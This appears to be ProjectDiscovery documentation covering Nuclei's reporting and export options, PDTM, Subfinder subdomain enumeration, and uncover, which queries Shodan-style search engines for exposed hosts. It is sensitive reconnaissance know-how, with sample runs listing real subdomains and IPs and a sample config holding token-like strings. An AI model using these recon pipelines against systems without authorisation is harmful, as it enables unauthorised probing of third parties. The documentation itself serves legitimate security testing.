```yaml
# elasticsearch contains configuration options for elasticsearch exporter
elasticsearch:
# IP for elasticsearch instance
ip: 127.0.0.1
# Port is the port of elasticsearch instance
port: 9200
# IndexName is the name of the elasticsearch index
index-name: nuclei
```
To forward results to Splunk HEC, create a config file with the following content and replace the appropriate values:
```yaml
# splunkhec contains configuration options for splunkhec exporter
splunkhec:
# Hostname for splunkhec instance
host: '$hec_host'
# Port is the port of splunkhec instance
port: 8088
# IndexName is the name of the splunkhec index
index-name: nuclei
# SSL enables ssl for splunkhec connection
ssl: true
# SSLVerification disables SSL verification for splunkhec
ssl-verification: true
# HEC Token for the splunkhec instance
token: '$hec_token'
```
To forward results to Jira, create a config file with the following content and replace the appropriate values:
The Jira reporting integration allows for custom fields, as well as using variables from the Nuclei templates in those custom fields.
The currently supported variables are: `$CVSSMetrics`, `$CVEID`, `$CWEID`, `$Host`, `$Severity`, `$CVSSScore`, `$Name`
In addition, Jira is strict about custom field entry. If the field is a dropdown, Jira accepts only the exact case-sensitive string, and the API call is slightly different. To support this, there are three types of custom fields:
* `name` is the dropdown value
* `id` is the ID value of the dropdown
* `freeform` is used when the custom field accepts any value
To avoid duplication, the JQL query that is run can be slightly modified via the config file.
The `CLOSED_STATUS` can be changed in the Jira configuration using the `status-not` variable:
`summary ~ TEMPLATE_NAME AND summary ~ HOSTNAME AND status != CLOSED_STATUS`
```yaml
jira:
# cloud is the boolean which tells if Jira instance is running in the cloud or on-prem version is used
cloud: true
# update-existing is the boolean which tells if the existing, opened issue should be updated or new one should be created
update-existing: false
# URL is the jira application url
url: https://localhost/jira
# account-id is the account-id of the Jira user or username in case of on-prem Jira
account-id: test-account-id
# email is the email of the user for Jira instance
email: test@test.com
# token is the token for Jira instance or password in case of on-prem Jira
token: test-token
# project-name is the name of the project.
project-name: test-project-name
# issue-type is the name of the created issue type (case sensitive)
issue-type: Bug
# SeverityAsLabel (optional) sends the severity as the label of the created issue
# Use custom fields for Jira Cloud instead
severity-as-label: true
# Whatever your final status is that you want to use as a closed ticket - Closed, Done, Remediated, etc
# When checking for duplicates, the JQL query will filter out statuses that match this.
# If it finds a match _and_ the ticket does have this status, a new one will be created.
status-not: Closed
# Customfield supports name, id and freeform. name and id are to be used when the custom field is a dropdown.
# freeform can be used if the custom field is just a text entry
# Variables can be used to pull various pieces of data from the finding itself.
# Supported variables: $CVSSMetrics, $CVEID, $CWEID, $Host, $Severity, $CVSSScore, $Name
custom_fields:
customfield_00001:
name: 'Nuclei'
customfield_00002:
freeform: $CVSSMetrics
customfield_00003:
freeform: $CVSSScore
```
To write results to a MongoDB database collection, update the config file with the connection information.
```yaml
mongodb:
# the connection string to the MongoDB database
# (e.g., mongodb://root:example@localhost:27017/nuclei?ssl=false&authSource=admin)
connection-string: ""
# the name of the collection to store the issues
collection-name: ""
# excludes the Request and Response from the results (helps with filesize)
omit-raw: false
# determines the number of results to be kept in memory before writing it to the database or 0 to
# persist all in memory and write all results at the end (default)
batch-size: 0
```
**Running nuclei with reporting module:**
```bash
nuclei -l urls.txt -t cves/ -rc issue-tracker.yaml
```
Similarly, other platforms can be configured. The reporting module also supports basic filtering and duplicate checks to avoid duplicate ticket creation.
```yaml
allow-list:
severity: high,critical
```
This ensures tickets are created only for issues identified with **high** and **critical** severity; similarly, a `deny-list` can be used to exclude issues with a specific severity.
If you are running periodic scans on the same assets, consider the `-rdb, -report-db` flag, which keeps a local copy of the valid findings in the given directory; the reporting module uses it for comparison so that it **creates tickets for unique issues only**.
```bash
nuclei -l urls.txt -t cves/ -rc issue-tracker.yaml -rdb prod
```
**Markdown Export**
Nuclei supports markdown export of valid findings with the `-me, -markdown-export` flag. This flag takes a directory as input to store the markdown-formatted reports.
Including the request/response in the markdown report is optional; they are included when the `-irr, -include-rr` flag is used along with `-me`.
```bash
nuclei -l urls.txt -t cves/ -irr -markdown-export reports
```
**SARIF Export**
Nuclei supports SARIF export of valid findings with the `-se, -sarif-export` flag. This flag takes a file as input to store the SARIF-formatted report.
```bash
nuclei -l urls.txt -t cves/ -sarif-export report.sarif
```
It is also possible to visualize Nuclei results using **SARIF** files.
1. By uploading a SARIF file to the [SARIF Viewer](https://microsoft.github.io/sarif-web-component/)
2. By uploading a SARIF file to [GitHub Actions](https://docs.github.com/en/code-security/code-scanning/integrating-with-code-scanning/uploading-a-sarif-file-to-github)
More info on the SARIF output is documented [here](https://github.com/projectdiscovery/nuclei/pull/2925).
These are **not official** Nuclei viewers, and `Nuclei` has no liability
for any of these options to visualize **Nuclei** results. These are just
some publicly available options to visualize SARIF files.
## Scan **Metrics**
Nuclei exposes running scan metrics on local port `9092` when the `-metrics` flag is used (merged into `-stats` from Nuclei v3.0.0); they can be accessed at **localhost:9092/metrics**. The default port is configurable using the `-metrics-port` flag.
Here is an example of querying `metrics` while running Nuclei as `nuclei -t cves/ -l urls.txt -metrics`:
```bash
curl -s localhost:9092/metrics | jq .
```
```json
{
"duration": "0:00:03",
"errors": "2",
"hosts": "1",
"matched": "0",
"percent": "99",
"requests": "350",
"rps": "132",
"startedAt": "2021-03-27T18:02:18.886745+05:30",
"templates": "256",
"total": "352"
}
```
## Passive Scan
The Nuclei engine supports passive-mode scanning for HTTP-based templates by utilizing its file support. With this, HTTP-based templates can be run against locally stored HTTP response data collected from any other tool.
```sh
nuclei -passive -target http_data
```
Passive mode support is limited to templates that use `{{BaseURL}}` or `{{BaseURL/}}` as the base path.
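One way to produce such data with Nuclei itself is the `-store-resp` flag from the output options; a sketch, assuming the stored responses are in a form passive mode can read:
```bash
# First pass: store raw request/response data in the http_data directory
nuclei -l urls.txt -sresp -srd http_data
# Second pass: run HTTP templates passively against the stored responses
nuclei -passive -target http_data
```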
## Running With Docker
If Nuclei was installed within a Docker container based on the [installation instructions](./install),
the executable does not have the context of the host machine. This means that the executable will not be able to access
local files such as those used for input lists or templates. To resolve this, the container should be run with volumes
mapped to the local filesystem to allow access to these files.
### Basic Usage
This example runs a Nuclei container against `google.com`, prints the results as JSONL, and removes the container once it
has completed:
```sh
docker run --rm projectdiscovery/nuclei -u google.com -jsonl
```
### Using Volumes
This example runs a Nuclei container against a list of URLs, writes the results to a `.jsonl` file and removes the
container once it has completed.
```sh
# This assumes there's a file called `urls.txt` in the current directory
docker run --rm -v ./:/app/ projectdiscovery/nuclei -l /app/urls.txt -jsonl -o /app/results.jsonl
# The results will be written to `./results.jsonl` on the host machine once the container has completed
```
# PDTM Install
Learn how to install PDTM and get started
Enter the command below in a terminal to install ProjectDiscovery's Tool Manager (PDTM) using Go.
```sh
go install -v github.com/projectdiscovery/pdtm/cmd/pdtm@latest
```
```bash
https://github.com/projectdiscovery/pdtm/releases
```
* Download the latest binary for your OS.
* Unzip the ready-to-run binary.
## Installation Notes
* PDTM requires the latest version of [**Go**](https://go.dev/doc/install)
* Projects are installed by downloading the released project binary. This means that projects can only be installed on the platforms for which binaries have been published.
* The path `$HOME/.pdtm/go/bin` is added to the `$PATH` variable by default
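After installation, a quick way to confirm the binary is reachable on your `$PATH` (a minimal sketch):
```bash
pdtm -version
```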
# PDTM Overview
Use ProjectDiscovery Tool Manager to download and organize your tools
ProjectDiscovery Tool Manager, or PDTM, is an easy way to download your ProjectDiscovery tools and keep them organized, up to date, and easy to access. For users interested in taking advantage of multiple ProjectDiscovery tools, we recommend downloading PDTM rather than downloading the binary for each tool separately.
Check out [this blog post](https://blog.projectdiscovery.io/getting-started-with-projectdiscovery-in-linux-and-windows/) on getting started with ProjectDiscovery tools on Linux and Windows.
You can access the PDTM [GitHub repo here](https://github.com/projectdiscovery/pdtm).
## Support
Questions about using PDTM? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running PDTM
Learn about PDTM with examples including commands and output
For all of the flags and options available for `PDTM` be sure to check out the [Usage](/tools/pdtm/usage) page. On this page we'll share an example of running PDTM.
If you have questions, reach out to us through [Help](/help).
## Basic Example
```console
$ pdtm -install-all
____
____ ____/ / /_____ ___
/ __ \/ __ / __/ __ __ \
/ /_/ / /_/ / /_/ / / / / /
/ .___/\__,_/\__/_/ /_/ /_/
/_/ v0.0.1
projectdiscovery.io
[INF] Installed httpx v1.1.1
[INF] Installed nuclei v2.6.3
[INF] Installed naabu v2.6.3
[INF] Installed dnsx v2.6.3
```
# PDTM Usage
Learn PDTM usage including flags and options
## Access help
Use `pdtm -h` to display all help options.
## PDTM options
```console
Usage:
./pdtm [flags]
Flags:
CONFIG:
-config string cli flag configuration file (default "$HOME/.config/pdtm/config.yaml")
-bp, -binary-path string custom location to download project binary (default "$HOME/.pdtm/go/bin")
INSTALL:
-i, -install string[] install single or multiple project by name (comma separated)
-ia, -install-all install all the projects
-ip, -install-path append path to PATH environment variables
UPDATE:
-u, -update string[] update single or multiple project by name (comma separated)
-ua, -update-all update all the projects
-up, -self-update update pdtm to latest version
-duc, -disable-update-check disable automatic pdtm update check
REMOVE:
-r, -remove string[] remove single or multiple project by name (comma separated)
-ra, -remove-all remove all the projects
-rp, -remove-path remove path from PATH environment variables
DEBUG:
-sp, -show-path show the current binary path then exit
-version show version of the project
-v, -verbose show verbose output
-nc, -no-color disable output content coloring (ANSI escape codes)
-disable-changelog, -dc disable release changelog in output
```
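For example, a sketch that installs two projects and later updates one of them, using the flags above:
```bash
# Install multiple projects by name (comma separated)
pdtm -install nuclei,httpx
# Update a single project
pdtm -update nuclei
```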
# Installing Subfinder
Learn about how to install and get started with Subfinder
```bash
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
```
Subfinder requires the latest **Go** version to install successfully.
```bash
brew install subfinder
```
Supported in **macOS** (or Linux)
```bash
docker pull projectdiscovery/subfinder:latest
```
```bash
git clone https://github.com/projectdiscovery/subfinder.git; \
cd subfinder/v2/cmd/subfinder; \
go build; \
mv subfinder /usr/local/bin/; \
subfinder -version;
```
Subfinder requires the latest **Go** version to install successfully.
```bash
https://github.com/projectdiscovery/subfinder/releases
```
* Download the latest binary for your OS.
* Unzip the ready-to-run binary.
## Installation notes
* Subfinder requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On macOS or Linux, in your terminal use
```
echo export PATH=$PATH:$HOME/go/bin >> $HOME/.bashrc
source $HOME/.bashrc
```
* To add the path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$HOME/go/bin/subfinder`
## Post install configuration
Subfinder is available immediately after installation; however, the following services require API keys to be configured before they will work:
[BeVigil](https://bevigil.com/osint-api), [BinaryEdge](https://binaryedge.io), [BufferOver](https://tls.bufferover.run), [C99](https://api.c99.nl/), [Censys](https://censys.io), [CertSpotter](https://sslmate.com/certspotter/api/), [Chaos](https://chaos.projectdiscovery.io),
[Chinaz](http://my.chinaz.com/ChinazAPI/DataCenter/MyDataApi), [DNSDB](https://api.dnsdb.info), [Fofa](https://fofa.info/static_pages/api_help), [FullHunt](https://fullhunt.io), [GitHub](https://github.com), [Intelx](https://intelx.io),
[PassiveTotal](http://passivetotal.org), [quake](https://quake.360.cn), [Robtex](https://www.robtex.com/api/), [SecurityTrails](http://securitytrails.com), [Shodan](https://shodan.io), [ThreatBook](https://x.threatbook.cn/en),
[VirusTotal](https://www.virustotal.com), [WhoisXML API](https://whoisxmlapi.com/), ZoomEye API [china](https://api.zoomeye.org) - [worldwide](https://api.zoomeye.hk),
[dnsrepo](https://dnsrepo.noc.org), [Hunter](https://hunter.qianxin.com/), [Facebook](https://developers.facebook.com), [BuiltWith](https://api.builtwith.com/domain-api)
You can also use the `subfinder -ls` command to display all the available sources.
These values are stored in the `$HOME/.config/subfinder/provider-config.yaml` file which will be created when you run the tool for the first time.
The configuration file uses the YAML format. Multiple API keys can be specified for each of these services, one of which will be used for enumeration.
Composite keys for sources like Censys, PassiveTotal, Fofa, Intelx, and Quake need to be separated with a colon (`:`).
## Example provider config
An example provider config file:
```yaml
binaryedge:
- 0bf8919b-aab9-42e4-9574-d3b639324597
- ac244e2f-b635-4581-878a-33f4e79a2c13
censys:
- ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
certspotter: []
passivetotal:
- sample-email@user.com:sample_password
redhuntlabs:
- ENDPOINT:API_TOKEN
- https://reconapi.redhuntlabs.com/community/v1/domains/subdomains:joEPzJJp2AuOCw7teAj63HYrPGnsxuPQ
securitytrails: []
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
github:
- ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
- ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
zoomeyeapi:
- zoomeye.hk:4f73021d-ff95-4f53-937f-83d6db719eec
quake:
- 0cb9030c-0a40-48a3-b8c4-fca28e466ba3
facebook:
- APP_ID:APP_SECRET
intelx:
- HOST:API_KEY
- 2.intelx.io:s4324-b98b-41b2-220e8-3320f6a1284d
```
## RedHunt Lab Attack Surface Recon API
RedHunt Labs's [Attack Surface Recon API](https://devportal.redhuntlabs.com/) has different API endpoints depending on the user's subscription. Make sure to add the appropriate endpoint before running any scans.
## ZoomEye API
Before conducting any scans, please ensure you are using the correct host to comply with geographical access restrictions of the ZoomEye API:
* **zoomeye.org** is exclusively for users within China.
* **zoomeye.hk** is for users outside China.
# Subfinder Overview
A robust discovery tool for passive enumeration of valid subdomains
## What is **Subfinder?**
Subfinder is a subdomain discovery tool that finds and returns valid subdomains for websites.
Using passive online sources, it has a simple modular architecture optimized for speed. Subfinder is built for one thing - passive subdomain enumeration, and it does that very well.
Subfinder complies with all the passive source licenses and usage restrictions for its sources. The passive model guarantees speed and stealthiness that can be leveraged by both penetration testers and bug bounty hunters alike.
[Check out this post on all of Subfinder's features](https://blog.projectdiscovery.io/do-you-really-know-subfinder-an-in-depth-guide-to-all-features-of-subfinder-beginner-to-advanced/) from the ProjectDiscovery Blog for more.
## Features and capabilities
* Fast and powerful resolution and wildcard elimination modules
* Curated passive sources to maximize results
* Multiple supported output formats (JSON, file, stdout)
* Optimized for speed and lightweight on resources
* STDIN/OUT support enables easy integration into workflows
## Additional Subfinder resources
As an open-source tool with a robust community, Subfinder has a lot of community-created resources available.
We are happy to share them to offer even more information about our tools.
Sharing these resources **is not formal approval or a recommendation** from ProjectDiscovery.
We cannot provide an endorsement of accuracy or validation that content is up-to-date. Anything shared here should be approached with caution.
* [https://securitytrails.com/blog/subfinder](https://securitytrails.com/blog/subfinder)
* [https://dhiyaneshgeek.github.io/bug/bounty/2020/02/06/recon-with-me/](https://dhiyaneshgeek.github.io/bug/bounty/2020/02/06/recon-with-me/)
* [https://dhiyaneshgeek.github.io/research,bug/bounty/2024/01/03/subfinder-securitytrails/](https://dhiyaneshgeek.github.io/research,bug/bounty/2024/01/03/subfinder-securitytrails/)
## Support
Questions about using Subfinder? Issues working through installation? Cool story or use case you want to share? Get in touch! Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running
Learn about running Subfinder with examples including commands and output
For all of the flags and options available for `Subfinder`, be sure to check out the [Usage](/tools/subfinder/usage) page. On this page we'll share examples of running Subfinder with specific flags and goals, and the output you can expect from each.
*If you have questions, reach out to us through [Help](/help).*
## Basic Usage
To run Subfinder on a specific target, use the `-d` flag to specify the domain.
```
subfinder -d hackerone.com
__ _____ __
_______ __/ /_ / __(_)___ ____/ /__ _____
/ ___/ / / / __ \/ /_/ / __ \/ __ / _ \/ ___/
(__ ) /_/ / /_/ / __/ / / / / /_/ / __/ /
/____/\__,_/_.___/_/ /_/_/ /_/\__,_/\___/_/ v2.4.9
projectdiscovery.io
Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
By using subfinder, you also agree to the terms of the APIs used.
[INF] Enumerating subdomains for hackerone.com
www.hackerone.com
support.hackerone.com
links.hackerone.com
api.hackerone.com
o1.email.hackerone.com
go.hackerone.com
3d.hackerone.com
resources.hackerone.com
a.ns.hackerone.com
b.ns.hackerone.com
mta-sts.hackerone.com
docs.hackerone.com
mta-sts.forwarding.hackerone.com
gslink.hackerone.com
hackerone.com
info.hackerone.com
mta-sts.managed.hackerone.com
events.hackerone.com
[INF] Found 18 subdomains for hackerone.com in 3 seconds 672 milliseconds
```
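To enumerate multiple targets at once, here is a minimal sketch using the `-dL` and `-o` flags (both documented on the [Usage](/tools/subfinder/usage) page) with a hypothetical `domains.txt` file:
```
# enumerate every domain listed in domains.txt and save results to a file
subfinder -dL domains.txt -o subdomains.txt
```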
## Pipe Results to Other Tools
The discovered subdomains can be piped to other tools. For example, you can pipe them to httpx, which will then find running HTTP servers on the hosts.
```
echo hackerone.com | subfinder -silent | httpx -silent
http://hackerone.com
http://www.hackerone.com
http://docs.hackerone.com
http://api.hackerone.com
https://docs.hackerone.com
http://mta-sts.managed.hackerone.com
```
## Subfinder and Docker
Pull the latest tagged `subfinder` Docker image using:
```
docker pull projectdiscovery/subfinder:latest
```
Run `subfinder` using the Docker image:
```
docker run projectdiscovery/subfinder:latest -d hackerone.com
```
Run `subfinder` using the Docker image with a local config file:
```
docker run -v $CONFIG/subfinder:/root/.config/subfinder -t projectdiscovery/subfinder -d hackerone.com
```
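To keep results outside the container, a hedged sketch that mounts a local directory and uses subfinder's `-o` flag (the `output` directory name is hypothetical):
```
# mount a local directory and write results into it
docker run -v $(pwd)/output:/output projectdiscovery/subfinder -d hackerone.com -o /output/subdomains.txt
```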
## Subfinder Go library
`subfinder` can also be used as a library; a minimal example of using the subfinder SDK is available [in the example library.](https://github.com/projectdiscovery/subfinder/blob/dev/v2/examples/main.go)
# Subfinder Usage
Learn Subfinder usage including input, flags, and filters
## Access help
Use `subfinder -h` to display all help options.
## Subfinder help options
```
Flags:
INPUT:
-d, -domain string[] domains to find subdomains for
-dL, -list string file containing list of domains for subdomain discovery
SOURCE:
-s, -sources string[] specific sources to use for discovery (-s crtsh,github). Use -ls to display all available sources.
-recursive use only sources that can handle subdomains recursively (e.g. subdomain.domain.tld vs domain.tld)
-all use all sources for enumeration (slow)
-es, -exclude-sources string[] sources to exclude from enumeration (-es alienvault,zoomeyeapi)
FILTER:
-m, -match string[] subdomain or list of subdomain to match (file or comma separated)
-f, -filter string[] subdomain or list of subdomain to filter (file or comma separated)
RATE-LIMIT:
-rl, -rate-limit int maximum number of http requests to send per second
-rls value maximum number of http requests to send per second for providers in key=value format (-rls "hackertarget=10/s,shodan=15/s")
-t int number of concurrent goroutines for resolving (-active only) (default 10)
UPDATE:
-up, -update update subfinder to latest version
-duc, -disable-update-check disable automatic subfinder update check
OUTPUT:
-o, -output string file to write output to
-oJ, -json write output in JSONL(ines) format
-oD, -output-dir string directory to write output (-dL only)
-cs, -collect-sources include all sources in the output (-json only)
-oI, -ip include host IP in output (-active only)
CONFIGURATION:
-config string flag config file (default "$CONFIG/subfinder/config.yaml")
-pc, -provider-config string provider config file (default "$CONFIG/subfinder/provider-config.yaml")
-r string[] comma separated list of resolvers to use
-rL, -rlist string file containing list of resolvers to use
-nW, -active display active subdomains only
-proxy string http proxy to use with subfinder
-ei, -exclude-ip exclude IPs from the list of domains
DEBUG:
-silent show only subdomains in output
-version show version of subfinder
-v show verbose output
-nc, -no-color disable color in output
-ls, -list-sources list all available sources
OPTIMIZATION:
-timeout int seconds to wait before timing out (default 30)
-max-time int minutes to wait for enumeration results (default 10)
```
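As a hedged sketch combining several of the flags above, the following run limits enumeration to two sources and writes JSONL results to a file:
```
# use only the crtsh and github sources, write JSONL output to results.jsonl
subfinder -d hackerone.com -s crtsh,github -oJ -o results.jsonl
```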
# uncover Install
Learn how to install uncover and get started
Enter the command below in a terminal to install uncover using Go.
```bash
go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest
```
## Installation Notes
* uncover requires the latest version of [**Go**](https://go.dev/doc/install)
# uncover Overview
A Go wrapper using APIs to discover exposed hosts
`uncover` is a Go wrapper that uses APIs from well-known search engines to quickly discover exposed hosts on the internet. It is built with automation in mind, so you can query it and use the results with your existing pipeline tools.
The uncover [GitHub repo is available here](https://github.com/projectdiscovery/uncover).
## Features
* Query multiple search engines at once
* Supported search engines:
* [Shodan](https://www.shodan.io)
* [Censys](https://search.censys.io)
* [FOFA](https://fofa.info)
* [Hunter](https://hunter.qianxin.com)
* [Quake](https://quake.360.net/quake/#/index)
* [Zoomeye](https://www.zoomeye.org)
* [Netlas](https://netlas.io/)
* [CriminalIP](https://www.criminalip.io)
* [PublicWWW](https://publicwww.com)
* [HunterHow](https://hunter.how)
* Multiple API key input support
* Automatic API key randomization
* **stdin** / **stdout** support for input
## Support
Questions about using `uncover`? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running uncover
Learn about running uncover including examples
## Basic Usage
For all of the flags and options available for **uncover**, be sure to check out the [Usage](/tools/uncover/usage) page.
If you have questions, reach out to us through [Help](/help).
### Default run
**uncover** supports multiple ways to provide the query, including **stdin** and the `-q` flag. By default, the `shodan` engine is used if no engine is specified.
```console
echo 'ssl:"Uber Technologies, Inc."' | uncover
__ ______ _________ _ _____ _____
/ / / / __ \/ ___/ __ \ | / / _ \/ ___/
/ /_/ / / / / /__/ /_/ / |/ / __/ /
\__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] By using uncover, you also agree to the terms of the APIs used.
107.180.12.116:993
107.180.26.155:443
104.244.99.31:443
161.28.20.79:443
104.21.8.108:443
198.71.233.203:443
104.17.237.13:443
162.255.165.171:443
12.237.119.61:443
192.169.250.211:443
104.16.251.50:443
```
Running **uncover** with **file** input containing multiple search queries, one per line:
```console
cat dorks.txt
ssl:"Uber Technologies, Inc."
title:"Grafana"
```
```console
uncover -q dorks.txt
__ ______ _________ _ _____ _____
/ / / / __ \/ ___/ __ \ | / / _ \/ ___/
/ /_/ / / / / /__/ /_/ / |/ / __/ /
\__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] By using uncover, you also agree to the terms of the APIs used.
107.180.12.116:993
107.180.26.155:443
104.244.99.31:443
161.28.20.79:443
104.21.8.108:443
198.71.233.203:443
2607:7c80:54:3::74:3001
104.198.55.35:80
46.101.82.244:3000
34.147.126.112:80
138.197.147.213:8086
```
### Single query against multiple search engines
**uncover** supports multiple search engines; **shodan** is used by default. The `-e` flag can be used to run the same query against any or all supported engines.
```console
echo jira | uncover -e shodan,censys,fofa,quake,hunter,zoomeye,netlas,criminalip
__ ______ _________ _ _____ _____
/ / / / __ \/ ___/ __ \ | / / _ \/ ___/
/ /_/ / / / / /__/ /_/ / |/ / __/ /
\__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] By using uncover, you also agree to the terms of the APIs used.
176.31.249.189:5001
13.211.116.80:443
43.130.1.221:631
192.195.70.29:443
52.27.22.181:443
117.48.120.226:8889
106.52.115.145:49153
13.69.135.128:443
193.35.99.158:443
18.202.109.218:8089
101.36.105.97:21379
42.194.226.30:2626
```
### Multiple queries against multiple search engines
```console
uncover -shodan 'http.component:"Atlassian Jira"' -censys 'services.software.product=`Jira`' -fofa 'app="ATLASSIAN-JIRA"' -quake 'Jira' -hunter 'Jira' -zoomeye 'app:"Atlassian JIRA"' -netlas 'jira' -criminalip 'Jira'
__ ______ _________ _ _____ _____
/ / / / __ \/ ___/ __ \ | / / _ \/ ___/
/ /_/ / / / / /__/ /_/ / |/ / __/ /
\__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] By using uncover, you also agree to the terms of the APIs used.
104.68.37.129:443
162.222.160.42:443
34.255.84.133:443
52.204.121.166:443
23.198.29.120:443
136.156.180.95:443
54.194.233.15:443
104.117.55.155:443
149.81.4.6:443
54.255.218.95:443
3.223.137.57:443
83.228.124.171:443
23.202.195.82:443
52.16.59.25:443
18.159.145.227:443
104.105.53.236:443
```
### Shodan-InternetDB API
**uncover** supports the [shodan-internetdb](https://internetdb.shodan.io) API to pull available ports for a given IP/CIDR input.
`shodan-idb` is used as the **default** engine when an **IP/CIDR** is provided as input; otherwise the `shodan` search engine is used.
```console
echo 51.83.59.99/24 | uncover
__ ______ _________ _ _____ _____
/ / / / __ \/ ___/ __ \ | / / _ \/ ___/
/ /_/ / / / / /__/ /_/ / |/ / __/ /
\__,_/_/ /_/\___/\____/|___/\___/_/ v0.0.9
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] By using uncover, you also agree to the terms of the APIs used.
51.83.59.1:53
51.83.59.1:10000
51.83.59.2:53
51.83.59.3:25
51.83.59.3:80
51.83.59.3:389
51.83.59.3:443
51.83.59.3:465
51.83.59.3:587
51.83.59.3:993
```
### Field Format
The `-f, -field` flag can be used to indicate which fields to return; currently `ip`, `port`, and `host` are supported.
```console
uncover -q jira -f host -silent
ec2-44-198-22-253.compute-1.amazonaws.com
ec2-18-246-31-139.us-west-2.compute.amazonaws.com
tasks.devrtb.com
leased-line-91-149-128-229.telecom.by
74.242.203.213.static.inetbone.net
ec2-52-211-7-108.eu-west-1.compute.amazonaws.com
ec2-54-187-161-180.us-west-2.compute.amazonaws.com
185-2-52-226.static.nucleus.be
ec2-34-241-80-255.eu-west-1.compute.amazonaws.com
```
### Field Formatting
**uncover** has a `-f, -field` flag that can be used to customize the output format. For example, with `uncover -f https://ip:port/version`, `ip:port` will be replaced with results in the output while keeping the surrounding format intact. This can also be used to specify a known scheme, path, or file so that the output can be passed directly as input to other tools in the pipeline.
```console
echo kubernetes | uncover -f https://ip:port/version -silent
https://35.222.229.38:443/version
https://52.11.181.228:443/version
https://35.239.255.1:443/version
https://34.71.48.11:443/version
https://130.211.54.173:443/version
https://54.184.250.232:443/version
```
The output of **uncover** can be piped to other projects in a workflow that accept **stdin** as input, for example:
* `uncover -q example -f ip | naabu` - Runs [naabu](https://github.com/projectdiscovery/naabu) for port scanning on the found hosts.
* `uncover -q title:GitLab | httpx` - Runs [httpx](https://github.com/projectdiscovery/httpx) for web server probing on the found results.
* `uncover -q 51.83.59.99/24 | httpx` - Runs [httpx](https://github.com/projectdiscovery/httpx) on the hosts/ports obtained from shodan-internetdb.
```console
uncover -q http.title:GitLab -silent | httpx -silent
https://15.185.150.109
https://139.162.137.16
https://164.68.115.243
https://135.125.215.186
https://163.172.59.119
http://15.236.10.197
https://129.206.117.248
```
* `uncover -q 'org:"Example Inc."' | httpx | nuclei` - Runs [httpx](https://github.com/projectdiscovery/httpx) / [nuclei](https://github.com/projectdiscovery/nuclei) for vulnerability assessment.
![image](https://user-images.githubusercontent.com/8293321/156753063-86ea4c5d-92ad-4c24-a7af-871c12aa278c.png)
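Putting the last bullet together end to end, a hedged sketch of the full pipeline (all three tools accept `-silent` to keep the output pipe-friendly):
```console
uncover -q 'org:"Example Inc."' -silent | httpx -silent | nuclei -silent
```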
# uncover Usage
Learn uncover usage including flags and filters
## Access help
Use `uncover -h` to display all of the help options.
## uncover options
```console
Usage:
./uncover [flags]
Flags:
INPUT:
-q, -query string[] search query, supports: stdin,file,config input (example: -q 'example query', -q 'query.txt')
-e, -engine string[] search engine to query (shodan,shodan-idb,fofa,censys,quake,hunter,zoomeye,netlas,criminalip,publicwww,hunterhow) (default shodan)
SEARCH-ENGINE:
-s, -shodan string[] search query for shodan (example: -shodan 'query.txt')
-sd, -shodan-idb string[] search query for shodan-idb (example: -shodan-idb 'query.txt')
-ff, -fofa string[] search query for fofa (example: -fofa 'query.txt')
-cs, -censys string[] search query for censys (example: -censys 'query.txt')
-qk, -quake string[] search query for quake (example: -quake 'query.txt')
-ht, -hunter string[] search query for hunter (example: -hunter 'query.txt')
-ze, -zoomeye string[] search query for zoomeye (example: -zoomeye 'query.txt')
-ne, -netlas string[] search query for netlas (example: -netlas 'query.txt')
-cl, -criminalip string[] search query for criminalip (example: -criminalip 'query.txt')
-pw, -publicwww string[] search query for publicwww (example: -publicwww 'query.txt')
-hh, -hunterhow string[] search query for hunterhow (example: -hunterhow 'query.txt')
CONFIG:
-pc, -provider string provider configuration file (default "$CONFIG/uncover/provider-config.yaml")
-config string flag configuration file (default "$CONFIG/uncover/config.yaml")
-timeout int timeout in seconds (default 30)
-rl, -rate-limit int maximum number of http requests to send per second
-rlm, -rate-limit-minute int maximum number of requests to send per minute
-retry int number of times to retry a failed request (default 2)
OUTPUT:
-o, -output string output file to write found results
-f, -field string field to display in output (ip,port,host) (default "ip:port")
-j, -json write output in JSONL(ines) format
-r, -raw write raw output as received by the remote api
-l, -limit int limit the number of results to return (default 100)
-nc, -no-color disable colors in output
DEBUG:
-silent show only results in output
-version show version of the project
-v show verbose output
```
## Notes
* **Keys/credentials** must be configured before running or using this project.
* The `query` flag supports **all and only the filters supported by the search engine.**
* Results are limited to `100` by default and can be increased with the `limit` flag (see the sketch after this list).
* The `shodan-idb` API doesn't require an API key and works out of the box.
* The `shodan-idb` API is used as the **default** engine when an **IP/CIDR** is provided as input.
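For instance, a minimal sketch raising the default result limit and writing JSONL output using the flags documented above:
```console
# return up to 200 results as JSONL written to results.jsonl
uncover -q 'ssl:"Uber Technologies, Inc."' -l 200 -j -o results.jsonl
```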